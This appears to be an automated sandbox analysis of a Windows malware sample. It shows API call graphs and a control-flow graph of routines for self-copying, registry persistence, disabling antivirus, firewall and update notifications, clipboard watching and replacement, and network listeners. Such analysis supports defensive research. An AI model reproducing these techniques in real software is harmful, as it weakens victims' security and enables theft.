API calls 5450->5451 5452 40b93b 5451->5452 5453 40b957 lstrlenA 5452->5453 5454 40c640 7 API calls 5453->5454 5455 40b98d 5454->5455 5456 40b9b8 5455->5456 5457 40a660 _invalid_parameter 3 API calls 5455->5457 5456->5420 5457->5456 5459 40bf71 lstrlenA 5458->5459 5460 40c640 7 API calls 5459->5460 5463 40bf8f 5460->5463 5461 40bf9b 5462 40c01f 5461->5462 5464 40a660 _invalid_parameter 3 API calls 5461->5464 5462->5444 5463->5459 5463->5461 5464->5462 5466 40b718 5465->5466 5467 40b754 LeaveCriticalSection 5466->5467 5490 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5466->5490 5467->5444 5469 40b743 5469->5467 5491 406e60 5470->5491 5473 40d610 17 API calls 5474 406e59 5473->5474 5474->5444 5476 406e60 75 API calls 5475->5476 5477 406edf 5476->5477 5478 406f0c 5477->5478 5506 406f20 5477->5506 5478->5444 5509 405f40 EnterCriticalSection 5480->5509 5482 406d0a 5483 406d3d 5482->5483 5514 406d50 5482->5514 5483->5444 5486 40a660 _invalid_parameter 3 API calls 5486->5483 5521 406000 EnterCriticalSection 5487->5521 5489 406e12 5489->5444 5490->5469 5494 406e73 5491->5494 5492 406e34 5492->5473 5492->5474 5494->5492 5495 405e50 EnterCriticalSection 5494->5495 5496 40ccd0 71 API calls 5495->5496 5497 405e6e 5496->5497 5498 405f2b LeaveCriticalSection 5497->5498 5499 405e87 5497->5499 5502 405ea8 5497->5502 5498->5494 5500 405e91 memcpy 5499->5500 5501 405ea6 5499->5501 5500->5501 5503 40a660 _invalid_parameter 3 API calls 5501->5503 5502->5501 5505 405f06 memcpy 5502->5505 5504 405f28 5503->5504 5504->5498 5505->5501 5507 40b930 13 API calls 5506->5507 5508 406f65 5507->5508 5508->5478 5510 405f5e 5509->5510 5511 405fea LeaveCriticalSection 5510->5511 5512 40a6d0 8 API calls 5510->5512 5511->5482 5513 405fbc 5512->5513 5513->5511 5515 40a450 _invalid_parameter 7 API calls 5514->5515 5516 406d62 memcpy 5515->5516 5517 40b930 13 API calls 5516->5517 5518 406dcc 5517->5518 5519 40a660 _invalid_parameter 3 API calls 5518->5519 5520 406d31 5519->5520 5520->5486 5546 40cd30 5521->5546 5524 406243 LeaveCriticalSection 5524->5489 5525 40ccd0 71 API calls 5526 406039 5525->5526 5526->5524 5527 406158 5526->5527 5529 406094 memcpy 5526->5529 5528 406181 5527->5528 5530 405c90 75 API calls 5527->5530 5531 40a660 _invalid_parameter 3 API calls 5528->5531 5532 40a660 _invalid_parameter 3 API calls 5529->5532 5530->5528 5533 4061a2 5531->5533 5534 4060b8 5532->5534 5533->5524 5535 4061b1 CreateFileW 5533->5535 5536 40a6d0 8 API calls 5534->5536 5535->5524 5537 4061d4 5535->5537 5538 4060c8 5536->5538 5541 4061f1 WriteFile 5537->5541 5542 40622f FlushFileBuffers CloseHandle 5537->5542 5539 40a660 _invalid_parameter 3 API calls 5538->5539 5540 4060ef 5539->5540 5543 40c640 7 API calls 5540->5543 5541->5537 5542->5524 5544 406125 5543->5544 5545 4072a0 71 API calls 5544->5545 5545->5527 5549 40c280 5546->5549 5551 40c291 5549->5551 5550 40a6d0 8 API calls 5550->5551 5551->5550 5552 40c1e0 70 API calls 5551->5552 5555 407fa0 68 API calls 5551->5555 5556 40c2ab 5551->5556 5557 40c2eb memcmp 5551->5557 5552->5551 5553 40a660 _invalid_parameter 3 API calls 5554 406022 5553->5554 5554->5524 5554->5525 5555->5551 5556->5553 5557->5551 5557->5556 5719 40d400 5720 40d416 5719->5720 5737 40d46e 5719->5737 5721 40d420 5720->5721 5722 40d473 5720->5722 5723 40d4c3 5720->5723 5720->5737 5724 40a240 7 API calls 5721->5724 5726 40d498 5722->5726 5727 40d48b InterlockedDecrement 5722->5727 5746 40c070 5723->5746 5728 40d42d 5724->5728 5729 40a660 _invalid_parameter 3 API calls 5726->5729 5727->5726 5742 4023d0 5728->5742 5731 40d4a4 5729->5731 5732 40a660 _invalid_parameter 3 API calls 5731->5732 5732->5737 5734 40b1f0 4 API calls 5735 40d44f 5734->5735 5736 40d45b InterlockedIncrement 5735->5736 5735->5737 5736->5737 5739 40d521 IsBadReadPtr 5740 40d4e9 5739->5740 5740->5737 5740->5739 5741 40ba20 194 API calls 5740->5741 5751 40c170 5740->5751 5741->5740 5743 402413 5742->5743 5744 4023d9 5742->5744 5743->5734 5744->5743 5745 4023ea InterlockedIncrement 5744->5745 5745->5743 5747 40c083 5746->5747 5748 40c0ad memcpy 5746->5748 5749 40a490 9 API calls 5747->5749 5748->5740 5750 40c0a4 5749->5750 5750->5748 5752 40c199 5751->5752 5753 40c18e 5751->5753 5752->5753 5754 40c1b1 memmove 5752->5754 5753->5740 5754->5753 5755 40da00 5765 4013b0 5755->5765 5757 40b6b0 5 API calls 5760 40da0d 5757->5760 5758 40da27 InterlockedExchangeAdd 5759 40da6b WaitForSingleObject 5758->5759 5758->5760 5759->5760 5761 40da84 5759->5761 5760->5757 5760->5758 5760->5759 5762 40b9d0 13 API calls 5760->5762 5764 40da8d 5760->5764 5777 401330 5761->5777 5762->5760 5766 40a240 7 API calls 5765->5766 5767 4013bb CreateEventA socket 5766->5767 5768 4013f2 5767->5768 5769 4013f8 5767->5769 5770 401330 8 API calls 5768->5770 5771 401401 bind 5769->5771 5772 401462 5769->5772 5770->5769 5773 401444 CreateThread 5771->5773 5774 401434 5771->5774 5772->5760 5773->5772 5787 401100 5773->5787 5775 401330 8 API calls 5774->5775 5776 40143a 5775->5776 5776->5760 5778 401339 5777->5778 5784 40139b 5777->5784 5779 401341 SetEvent WaitForSingleObject CloseHandle 5778->5779 5778->5784 5785 401369 5779->5785 5786 40138b 5779->5786 5781 401395 5783 40a660 _invalid_parameter 3 API calls 5781->5783 5782 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5782->5785 5783->5784 5784->5764 5785->5782 5785->5786 5816 40aff0 shutdown closesocket 5786->5816 5788 401115 ioctlsocket 5787->5788 5789 4011e4 5788->5789 5794 40113a 5788->5794 5790 40a660 _invalid_parameter 3 API calls 5789->5790 5792 4011ea 5790->5792 5791 4011cd WaitForSingleObject 5791->5788 5791->5789 5793 40a490 9 API calls 5793->5794 5794->5791 5794->5793 5795 401168 recvfrom 5794->5795 5796 4011ad InterlockedExchangeAdd 5794->5796 5795->5791 5795->5794 5798 401000 5796->5798 5799 401014 5798->5799 5800 40103b 5799->5800 5801 40a240 7 API calls 5799->5801 5809 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5800->5809 5801->5800 5803 40105b 5810 401580 5803->5810 5805 4010ec 5805->5794 5806 4010a3 IsBadReadPtr 5807 401071 5806->5807 5807->5805 5807->5806 5808 4010d8 memmove 5807->5808 5808->5807 5809->5803 5811 401592 5810->5811 5812 4015a5 memcpy 5810->5812 5814 40a490 9 API calls 5811->5814 5813 4015c1 5812->5813 5813->5807 5815 40159f 5814->5815 5815->5812 5816->5781 5817 40d980 5818 40ba20 194 API calls 5817->5818 5819 40d9b8 5818->5819 5820 40d580 5825 401b60 5820->5825 5822 40d595 5823 40d5b4 5822->5823 5824 401b60 16 API calls 5822->5824 5824->5823 5826 401b70 5825->5826 5844 401c42 5825->5844 5827 40a240 7 API calls 5826->5827 5826->5844 5828 401b9d 5827->5828 5829 40a6d0 8 API calls 5828->5829 5828->5844 5830 401bc9 5829->5830 5831 401be6 5830->5831 5832 401bd6 5830->5832 5834 401ae0 4 API calls 5831->5834 5833 40a660 _invalid_parameter 3 API calls 5832->5833 5835 401bdc 5833->5835 5836 401bf3 5834->5836 5835->5822 5837 401c33 5836->5837 5838 401bfc EnterCriticalSection 5836->5838 5841 40a660 _invalid_parameter 3 API calls 5837->5841 5839 401c13 5838->5839 5840 401c1f LeaveCriticalSection 5838->5840 5839->5840 5840->5822 5842 401c3c 5841->5842 5843 40a660 _invalid_parameter 3 API calls 5842->5843 5843->5844 5844->5822 5558 4069c8 5566 40696e 5558->5566 5559 40699e lstrcmpiW 5559->5566 5560 406b19 FindNextFileW 5562 406942 lstrcmpW 5560->5562 5563 406b35 FindClose 5560->5563 5561 406a05 PathMatchSpecW 5564 406a26 wsprintfW SetFileAttributesW DeleteFileW 5561->5564 5561->5566 5565 406958 lstrcmpW 5562->5565 5562->5566 5568 406b42 5563->5568 5564->5566 5565->5566 5566->5559 5566->5560 5566->5561 5567 406a83 PathFileExistsW 5566->5567 5571 406510 11 API calls 5566->5571 5567->5566 5569 406a99 wsprintfW wsprintfW 5567->5569 5569->5566 5570 406b03 MoveFileExW 5569->5570 5570->5560 5571->5566 5572 40f34c 5573 40f354 5572->5573 5575 40f408 5573->5575 5578 40f589 5573->5578 5577 40f38d 5577->5575 5582 40f474 RtlUnwind 5577->5582 5580 40f59e 5578->5580 5581 40f5ba 5578->5581 5579 40f629 NtQueryVirtualMemory 5579->5581 5580->5579 5580->5581 5581->5577 5583 40f48c 5582->5583 5583->5577 5584 40b8d0 5585 40b8d3 WaitForSingleObject 5584->5585 5586 40b901 5585->5586 5587 40b8eb InterlockedDecrement 5585->5587 5588 40b8fa 5587->5588 5588->5585 5589 40b010 16 API calls 5588->5589 5589->5588 5590 401f50 GetQueuedCompletionStatus 5591 401f92 5590->5591 5592 402008 5590->5592 5593 401f97 WSAGetOverlappedResult 5591->5593 5597 401d60 5591->5597 5593->5591 5594 401fb9 WSAGetLastError 5593->5594 5594->5591 5596 401fd3 GetQueuedCompletionStatus 5596->5591 5596->5592 5598 401ef2 InterlockedDecrement setsockopt closesocket 5597->5598 5599 401d74 5597->5599 5601 401e39 5598->5601 5599->5598 5600 401d7c 5599->5600 5617 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5600->5617 5601->5596 5603 401d81 InterlockedExchange 5604 401d98 5603->5604 5605 401e4e 5603->5605 5604->5601 5610 401da9 InterlockedDecrement 5604->5610 5611 401dbc InterlockedDecrement InterlockedExchangeAdd 5604->5611 5606 401e67 5605->5606 5607 401e57 InterlockedDecrement 5605->5607 5608 401e72 5606->5608 5609 401e87 InterlockedDecrement 5606->5609 5607->5596 5626 401ae0 WSASend 5608->5626 5613 401ee9 5609->5613 5610->5596 5614 401e2f 5611->5614 5613->5596 5618 401cf0 5614->5618 5615 401e7e 5615->5596 5617->5603 5619 401d00 InterlockedExchangeAdd 5618->5619 5620 401cfc 5618->5620 5621 401d53 5619->5621 5622 401d17 InterlockedIncrement 5619->5622 5620->5601 5621->5601 5632 401c50 WSARecv 5622->5632 5624 401d46 5624->5621 5625 401d4c InterlockedDecrement 5624->5625 5625->5621 5627 401b50 5626->5627 5628 401b12 WSAGetLastError 5626->5628 5627->5615 5628->5627 5629 401b1f 5628->5629 5630 401b56 5629->5630 5631 401b26 Sleep WSASend 5629->5631 5630->5615 5631->5627 5631->5628 5633 401cd2 5632->5633 5634 401c8e 5632->5634 5633->5624 5635 401c90 WSAGetLastError 5634->5635 5636 401ca4 Sleep WSARecv 5634->5636 5637 401cdb 5634->5637 5635->5633 5635->5634 5636->5633 5636->5635 5637->5624 5638 40d9d0 5641 401200 5638->5641 5640 40d9f2 5642 40121d 5641->5642 5656 401314 5641->5656 5643 40a450 _invalid_parameter 7 API calls 5642->5643 5642->5656 5644 401247 memcpy htons 5643->5644 5645 4012ed 5644->5645 5646 401297 sendto 5644->5646 5649 40a660 _invalid_parameter 3 API calls 5645->5649 5647 4012b6 InterlockedExchangeAdd 5646->5647 5648 4012e9 5646->5648 5647->5646 5650 4012cc 5647->5650 5648->5645 5651 40130a 5648->5651 5652 4012fc 5649->5652 5653 40a660 _invalid_parameter 3 API calls 5650->5653 5654 40a660 _invalid_parameter 3 API calls 5651->5654 5652->5640 5655 4012db 5653->5655 5654->5656 5655->5640 5656->5640 5845 405910 GetWindowLongW 5846 405934 5845->5846 5847 405956 5845->5847 5848 405941 5846->5848 5849 4059c7 IsClipboardFormatAvailable 5846->5849 5850 4059a6 5847->5850 5851 40598e SetWindowLongW 5847->5851 5862 405951 5847->5862 5854 405964 SetClipboardViewer SetWindowLongW 5848->5854 5855 405947 5848->5855 5852 4059e3 IsClipboardFormatAvailable 5849->5852 5853 4059da 5849->5853 5857 4059ac SendMessageA 5850->5857 5850->5862 5851->5862 5852->5853 5858 4059f8 IsClipboardFormatAvailable 5852->5858 5860 405a15 OpenClipboard 5853->5860 5879 405adc 5853->5879 5856 405b44 DefWindowProcA 5854->5856 5859 405afd RegisterRawInputDevices ChangeClipboardChain 5855->5859 5855->5862 5857->5862 5858->5853 5859->5856 5863 405a25 GetClipboardData 5860->5863 5860->5879 5861 405ae5 SendMessageA 5861->5862 5862->5856 5863->5862 5864 405a3d GlobalLock 5863->5864 5864->5862 5865 405a55 5864->5865 5866 405a68 5865->5866 5867 405a89 5865->5867 5868 405a9e 5866->5868 5869 405a6e 5866->5869 5870 405630 13 API calls 5867->5870 5886 405750 5868->5886 5871 405a74 GlobalUnlock CloseClipboard 5869->5871 5880 405510 5869->5880 5870->5871 5875 405ac7 5871->5875 5871->5879 5894 4048a0 lstrlenW 5875->5894 5878 40a660 _invalid_parameter 3 API calls 5878->5879 5879->5861 5879->5862 5883 40551b 5880->5883 5881 405521 lstrlenW 5881->5883 5885 405534 5881->5885 5882 40a450 _invalid_parameter 7 API calls 5882->5883 5883->5881 5883->5882 5884 405551 lstrcpynW 5883->5884 5883->5885 5884->5883 5884->5885 5885->5871 5891 40575d 5886->5891 5887 405763 lstrlenA 5887->5891 5892 405776 5887->5892 5888 4055d0 2 API calls 5888->5891 5889 40a450 _invalid_parameter 7 API calls 5889->5891 5891->5887 5891->5888 5891->5889 5891->5892 5893 40a660 _invalid_parameter 3 API calls 5891->5893 5931 405700 5891->5931 5892->5871 5893->5891 5903 4048d4 5894->5903 5895 404d5e StrStrW 5896 404d71 5895->5896 5897 404d75 StrStrW 5895->5897 5896->5897 5898 404d88 5897->5898 5899 404d8c StrStrW 5897->5899 5898->5899 5900 404d9f 5899->5900 5901 404ae2 5900->5901 5902 404e09 isalpha 5900->5902 5915 404e43 5900->5915 5901->5878 5902->5900 5904 404e20 isdigit 5902->5904 5903->5901 5905 404c69 StrStrW 5903->5905 5908 404af4 5903->5908 5904->5900 5904->5901 5906 404c94 StrStrW 5905->5906 5905->5908 5907 404cbf StrStrW 5906->5907 5906->5908 5907->5908 5908->5895 5908->5901 5909 405351 StrStrW 5913 405364 5909->5913 5914 40536b StrStrW 5909->5914 5910 405303 StrStrW 5911 405316 5910->5911 5912 40531d StrStrW 5910->5912 5911->5912 5916 405330 5912->5916 5917 405337 StrStrW 5912->5917 5913->5914 5918 405385 StrStrW 5914->5918 5919 40537e 5914->5919 5915->5909 5915->5910 5916->5917 5917->5909 5920 40534a 5917->5920 5921 405398 5918->5921 5922 40539f StrStrW 5918->5922 5919->5918 5920->5909 5921->5922 5923 4053b2 5922->5923 5924 4053b9 StrStrW 5922->5924 5923->5924 5925 4053cc lstrlenA 5924->5925 5925->5901 5927 405492 GlobalAlloc 5925->5927 5927->5901 5928 4054ad GlobalLock 5927->5928 5928->5901 5929 4054c0 memcpy GlobalUnlock OpenClipboard 5928->5929 5929->5901 5930 4054ed EmptyClipboard SetClipboardData CloseClipboard 5929->5930 5930->5901 5932 40570b 5931->5932 5933 405711 lstrlenA 5932->5933 5934 4055d0 2 API calls 5932->5934 5935 405744 5932->5935 5933->5932 5934->5932 5935->5891 5657 40e5d1 5659 40e5da 5657->5659 5658 40e6cd 5659->5658 5660 40e643 lstrcmpiW 5659->5660 5661 40e6c3 SysFreeString 5660->5661 5662 40e656 5660->5662 5661->5658 5663 40e3c0 2 API calls 5662->5663 5665 40e664 5663->5665 5664 40e6b5 5664->5661 5665->5661 5665->5664 5666 40e693 lstrcmpiW 5665->5666 5667 40e6a5 5666->5667 5668 40e6ab SysFreeString 5666->5668 5667->5668 5668->5664 5669 40f354 5670 40f372 5669->5670 5671 40f408 5669->5671 5672 40f589 NtQueryVirtualMemory 5670->5672 5674 40f38d 5672->5674 5673 40f474 RtlUnwind 5673->5674 5674->5671 5674->5673 5936 405f1d 5937 405eb1 5936->5937 5938 405f1b 5937->5938 5942 405f06 memcpy 5937->5942 5939 40a660 _invalid_parameter 3 API calls 5938->5939 5940 405f28 LeaveCriticalSection 5939->5940 5942->5938 5675 40d0e0 5680 40d140 5675->5680 5678 40d10e 5679 40d140 send 5679->5678 5681 40d151 send 5680->5681 5682 40d16e 5681->5682 5683 40d0f3 5681->5683 5682->5681 5682->5683 5683->5678 5683->5679 5684 40d360 5687 40d364 5684->5687 5686 40d380 WaitForSingleObject 5686->5687 5689 40d3a5 5686->5689 5687->5686 5688 40cf80 208 API calls 5687->5688 5687->5689 5690 40b6b0 EnterCriticalSection 5687->5690 5688->5687 5691 40b6e7 LeaveCriticalSection 5690->5691 5692 40b6cf 5690->5692 5691->5687 5693 40c370 3 API calls 5692->5693 5694 40b6da 5693->5694 5694->5691 5943 40daa0 5949 401470 5943->5949 5945 40dab4 5946 40dadf 5945->5946 5947 40dac5 WaitForSingleObject 5945->5947 5948 401330 8 API calls 5947->5948 5948->5946 5950 401483 5949->5950 5951 401572 5949->5951 5950->5951 5952 40a240 7 API calls 5950->5952 5951->5945 5953 401498 CreateEventA socket 5952->5953 5954 4014d5 5953->5954 5955 4014cf 5953->5955 5954->5951 5957 4014e2 htons setsockopt bind 5954->5957 5956 401330 8 API calls 5955->5956 5956->5954 5958 401546 5957->5958 5959 401558 CreateThread 5957->5959 5960 401330 8 API calls 5958->5960 5959->5951 5962 401100 20 API calls _invalid_parameter 5959->5962 5961 40154c 5960->5961 5961->5945 5963 401920 GetTickCount WaitForSingleObject 5964 401ac9 5963->5964 5965 40194d WSAWaitForMultipleEvents 5963->5965 5966 4019f0 GetTickCount 5965->5966 5967 40196a WSAEnumNetworkEvents 5965->5967 5968 401a43 GetTickCount 5966->5968 5969 401a05 EnterCriticalSection 5966->5969 5967->5966 5979 401983 5967->5979 5972 401ab5 WaitForSingleObject 5968->5972 5973 401a4e EnterCriticalSection 5968->5973 5970 401a16 5969->5970 5971 401a3a LeaveCriticalSection 5969->5971 5977 401a29 LeaveCriticalSection 5970->5977 6005 401820 5970->6005 5971->5972 5972->5964 5972->5965 5975 401aa1 LeaveCriticalSection GetTickCount 5973->5975 5976 401a5f InterlockedExchangeAdd 5973->5976 5974 401992 accept 5974->5966 5974->5979 5975->5972 6023 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5976->6023 5977->5972 5979->5966 5979->5974 5984 401cf0 7 API calls 5979->5984 5985 4022c0 5979->5985 5983 401a72 5983->5975 5983->5976 6024 40aff0 shutdown closesocket 5983->6024 5984->5966 5986 4022d2 EnterCriticalSection 5985->5986 5987 4022cd 5985->5987 5988 4022e7 5986->5988 5989 4022fd LeaveCriticalSection 5986->5989 5987->5979 5988->5989 5990 402308 5989->5990 5991 40230f 5989->5991 5990->5979 5992 40a240 7 API calls 5991->5992 5993 402319 5992->5993 5994 402326 getpeername CreateIoCompletionPort 5993->5994 5995 4023b8 5993->5995 5996 4023b2 5994->5996 5997 402366 5994->5997 6027 40aff0 shutdown closesocket 5995->6027 6001 40a660 _invalid_parameter 3 API calls 5996->6001 6025 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5997->6025 5999 4023c3 5999->5979 6001->5995 6002 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6026 4021e0 EnterCriticalSection LeaveCriticalSection 6002->6026 6004 4023ab 6004->5979 6006 40190f 6005->6006 6007 401830 6005->6007 6006->5971 6007->6006 6008 40183d InterlockedExchangeAdd 6007->6008 6008->6006 6014 401854 6008->6014 6009 401880 6010 401891 6009->6010 6037 40aff0 shutdown closesocket 6009->6037 6011 4018a7 InterlockedDecrement 6010->6011 6015 401901 6010->6015 6011->6015 6014->6006 6014->6009 6028 4017a0 EnterCriticalSection 6014->6028 6016 402247 6015->6016 6017 402265 EnterCriticalSection 6015->6017 6016->5971 6018 40229c LeaveCriticalSection DeleteCriticalSection 6017->6018 6020 40227d 6017->6020 6019 40a660 _invalid_parameter 3 API calls 6018->6019 6019->6016 6021 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6020->6021 6022 40229b 6020->6022 6021->6020 6022->6018 6023->5983 6024->5983 6025->6002 6026->6004 6027->5999 6029 401807 LeaveCriticalSection 6028->6029 6030 4017ba InterlockedExchangeAdd 6028->6030 6029->6014 6031 4017ca LeaveCriticalSection 6030->6031 6032 4017d9 6030->6032 6031->6014 6033 40a660 _invalid_parameter 3 API calls 6032->6033 6034 4017fe 6033->6034 6035 40a660 _invalid_parameter 3 API calls 6034->6035 6036 401804 6035->6036 6036->6029 6037->6010 5695 405fe5 5697 405f5e 5695->5697 5696 405fea LeaveCriticalSection 5697->5696 5698 40a6d0 8 API calls 5697->5698 5699 405fbc 5698->5699 5699->5696 6038 406ba6 6041 406b88 6038->6041 6039 406cc8 Sleep 6039->6041 6040 406bb9 6042 406260 4 API calls 6040->6042 6041->6039 6041->6040 6043 406cd8 ExitThread 6041->6043 6046 406340 4 API calls 6041->6046 6045 406bca 6042->6045 6044 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6048 406c66 wsprintfW 6044->6048 6049 406c7b wsprintfW 6044->6049 6045->6044 6047 406beb 6045->6047 6046->6041 6048->6049 6050 406650 51 API calls 6049->6050 6050->6047 6051 40d3b0 6057 4021b0 6051->6057 6054 40d3ef 6055 40d3d5 WaitForSingleObject 6061 401600 6055->6061 6058 4021cf 6057->6058 6059 4021bb 6057->6059 6058->6054 6058->6055 6059->6058 6082 402020 6059->6082 6062 401737 6061->6062 6063 40160d 6061->6063 6062->6054 6063->6062 6064 401619 EnterCriticalSection 6063->6064 6065 401630 6064->6065 6066 4016b5 LeaveCriticalSection SetEvent 6064->6066 6065->6066 6071 401641 InterlockedDecrement 6065->6071 6073 40165a InterlockedExchangeAdd 6065->6073 6080 4016a0 InterlockedDecrement 6065->6080 6067 4016d0 6066->6067 6068 4016e8 6066->6068 6069 4016d6 PostQueuedCompletionStatus 6067->6069 6070 40d780 11 API calls 6068->6070 6069->6068 6069->6069 6072 4016f3 6070->6072 6071->6065 6074 40d8c0 7 API calls 6072->6074 6073->6065 6075 40166d InterlockedIncrement 6073->6075 6076 4016fc CloseHandle CloseHandle WSACloseEvent 6074->6076 6077 401c50 4 API calls 6075->6077 6103 40aff0 shutdown closesocket 6076->6103 6077->6065 6079 401724 DeleteCriticalSection 6081 40a660 _invalid_parameter 3 API calls 6079->6081 6080->6065 6081->6062 6083 40a240 7 API calls 6082->6083 6084 40202b 6083->6084 6085 402038 GetSystemInfo InitializeCriticalSection CreateEventA 6084->6085 6086 4021a5 6084->6086 6087 402076 CreateIoCompletionPort 6085->6087 6088 40219f 6085->6088 6086->6058 6087->6088 6089 40208f 6087->6089 6090 401600 36 API calls 6088->6090 6091 40d5e0 8 API calls 6089->6091 6090->6086 6092 402094 6091->6092 6092->6088 6093 40209f WSASocketA 6092->6093 6093->6088 6094 4020bd setsockopt htons bind 6093->6094 6094->6088 6095 402126 listen 6094->6095 6095->6088 6096 40213a WSACreateEvent 6095->6096 6096->6088 6097 402147 WSAEventSelect 6096->6097 6097->6088 6098 402159 6097->6098 6099 40217f 6098->6099 6100 40d610 17 API calls 6098->6100 6101 40d610 17 API calls 6099->6101 6100->6098 6102 402194 6101->6102 6102->6058 6103->6079 5714 4074f1 ExitThread 5715 407ff9 5716 408002 5715->5716 5717 408011 34 API calls 5716->5717 5718 408e46 5716->5718 6116 40a73e 6117 40a660 _invalid_parameter 3 API calls 6116->6117 6120 40a6fd 6117->6120 6118 40a712 6119 40a450 _invalid_parameter 7 API calls 6119->6120 6120->6118 6120->6119 6121 40a714 memcpy 6120->6121 6121->6120

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ebe0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 14 4075f0-4075f2 ExitProcess 3->14 15 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407902-407922 RegOpenKeyExW 4->5 6 4078d6-4078fc RegSetValueExA RegCloseKey 4->6 8 407924-407950 RegSetValueExA RegCloseKey 5->8 9 407955-407975 RegOpenKeyExW 5->9 6->5 11 4079fa-407a1a RegOpenKeyExW 8->11 12 407977-4079a6 RegCreateKeyExW RegCloseKey 9->12 13 4079ac-4079cc RegOpenKeyExW 9->13 17 407a1c-407a48 RegSetValueExA RegCloseKey 11->17 18 407a4d-407a6d RegOpenKeyExW 11->18 12->13 13->11 16 4079ce-4079f4 RegSetValueExA RegCloseKey 13->16 19 40764c-40767b SetFileAttributesW RegOpenKeyExW 15->19 20 4076de-407720 Sleep wsprintfW CopyFileW 15->20 16->11 23 407b49-407b69 RegOpenKeyExW 17->23 24 407aa4-407ac4 RegOpenKeyExW 18->24 25 407a6f-407a9e RegCreateKeyExW RegCloseKey 18->25 19->20 26 40767d-4076b0 wcslen RegSetValueExW 19->26 21 407726-407755 SetFileAttributesW RegOpenKeyExW 20->21 22 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 20->22 21->22 29 407757-40778a wcslen RegSetValueExW 21->29 22->4 30 407817-407846 SetFileAttributesW RegOpenKeyExW 22->30 27 407b97-407bb7 RegOpenKeyExW 23->27 28 407b6b-407b91 RegSetValueExA RegCloseKey 23->28 31 407ac6-407af5 RegCreateKeyExW RegCloseKey 24->31 32 407afb-407b1b RegOpenKeyExW 24->32 25->24 26->20 33 4076b2-4076d4 RegCloseKey call 40ee30 26->33 34 407be5-407c05 RegOpenKeyExA 27->34 35 407bb9-407bdf RegSetValueExA RegCloseKey 27->35 28->27 29->22 36 40778c-4077ae RegCloseKey call 40ee30 29->36 30->4 37 407848-40787b wcslen RegSetValueExW 30->37 31->32 32->23 38 407b1d-407b43 RegSetValueExA RegCloseKey 32->38 33->20 45 4076d6-4076d8 ExitProcess 33->45 40 407cf1-407d11 RegOpenKeyExA 34->40 41 407c0b-407ceb RegSetValueExA * 7 RegCloseKey 34->41 35->34 36->22 50 4077b0-4077b2 ExitProcess 36->50 37->4 43 40787d-40789f RegCloseKey call 40ee30 37->43 38->23 46 407d17-407df7 RegSetValueExA * 7 RegCloseKey 40->46 47 407dfd-407e12 Sleep call 40cc80 40->47 41->40 43->4 54 4078a1-4078a3 ExitProcess 43->54 46->47 55 407f87-407f90 47->55 56 407e18-407f84 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40daf0 call 406f70 CreateEventA call 40c3b0 call 40d5e0 call 40b770 call 40d610 * 4 call 40d780 call 40d8c0 47->56 56->55
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,b7x663937xa), ref: 0040751D
                                                                                • GetLastError.KERNEL32 ref: 00407529
                                                                                • ExitProcess.KERNEL32 ref: 00407538
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041AA40,00000105), ref: 00407572
                                                                                • PathFindFileNameW.SHLWAPI(0041AA40), ref: 0040757D
                                                                                • wsprintfW.USER32 ref: 0040759A
                                                                                • DeleteFileW.KERNEL32(?), ref: 004075AA
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                                                                • wcscmp.NTDLL ref: 004075D3
                                                                                • ExitProcess.KERNEL32 ref: 004075F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security 